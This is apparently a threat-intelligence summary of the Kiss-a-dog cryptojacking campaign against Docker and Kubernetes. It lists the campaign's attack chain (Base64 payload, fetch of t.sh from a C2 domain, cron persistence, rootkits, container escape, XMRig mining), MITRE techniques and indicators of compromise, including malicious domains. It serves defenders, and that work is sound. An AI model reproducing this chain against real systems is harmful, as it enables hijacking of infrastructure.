Threat Research

New Kiss-a-dog Cryptojacking Campaign Targets Docker and Kubernetes

Securonix

CrowdStrike tracks a new cryptojacking campaign, Kiss-a-dog, targeting vulnerable Docker and Kubernetes infrastructure with an obscured domain, container escape, and anonymous mining pools. The operation uses multiple C2 servers, user- and kernel-mode rootkits, container backdoors, lateral movement, and persistence mechanisms to mine cryptocurrency. hashtags #Kiss-a-dog #XMRig

Keypoints

  • The Kiss-a-dog campaign targets vulnerable Docker and Kubernetes infrastructure using an obscure domain from the payload and anonymized mining pools.
  • The operation relies on container escape attempts, backdoored containers, and lateral movement to persist and expand within the environment.
  • The initial entry point decodes a Base64 payload, downloads t.sh from kiss.a-dog.top, installs curl, and schedules a malicious payload as a cron job.
  • The domain kiss.a-dog.top is obscured in the payload and resolved via DNS to fetch subsequent payloads from a C2 server.
  • Kiss-a-dog uses Diamorphine and libprocesshider rootkits to hide its processes and evade detection.
  • XMRig mining is deployed, disguised as [CMAKE], and pools are hosted on love.a-dog.top and touch.a-dog.top to obscure wallet addresses.
  • The campaign includes network reconnaissance with PNScan, Masscan, and ZGrab to identify vulnerable Redis and Docker instances and uses Redis as a backdoor.

MITRE Techniques

  • [T1027] Obfuscated/Compressed Files or Information – The entry point payload is Base64 encoded and later decoded: “…after Base64 decode.”.
  • [T1071.004] DNS – Attackers query a DNS server to resolve the obscured domain before downloading the first payload: “Successful DNS query” is shown.
  • [T1053.003] Cron – The malicious payload is added as a cron job to achieve persistence: “…adds a malicious payload as a cron job.”.
  • [T1574.002] Hijack Execution Flow: Shared Libraries (LD_PRELOAD) – The campaign uses LD_PRELOAD to inject malicious shared libraries into every process: “…inject malicious shared libraries into every process spawned…”.
  • [T1014] Rootkit – Use of Diamorphine and libprocesshider rootkits to hide the process from user space: “…Diamorphine rootkit… and libprocesshide rootkit to hide the process…”.
  • [T1105] Ingress Tool Transfer (or T1105-equivalent for payload download) – Downloading t.sh from C2 after DNS resolution is used to fetch payloads.
  • [T1046] Network Service Discovery – Tools like pnscan, masscan, and zgrab scan internet IP ranges to find vulnerable Docker/Redis instances: “…download and compile network-scanning tools like pnscan, masscan and zgrab…”
  • [T1496] Resource Hijacking – Use of XMRig to mine cryptocurrency on compromised containers: “…XMRig, a popular mining software, to mine the cryptocurrency.”.
  • [T1068] Privilege Escalation – Container escape via host mount enabling movement and persistence in the network: “…host mount to escape from the container.”.

Indicators of Compromise

  • [Domain] Kiss-a-dog.top domain used to host initial payloads – kiss.a-dog.top; DNS resolution leads to payload download.
  • [Domain] Pool domains used for mining – love.a-dog.top, touch.a-dog.top.
  • [File] t.sh – malicious payload downloaded from the domain and executed.
  • [File] diamorphin.ko – kernel module rootkit loaded into the host.
  • [File] cmake.service – disguised service used to run the mining binary.
  • [File] XMRig (mining software) – disguised as [CMAKE] and configured to mine via pool servers.
  • [File]_pool configuration files (for XMRig) referencing love.a-dog.top and touch.a-dog.top

Read more: https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/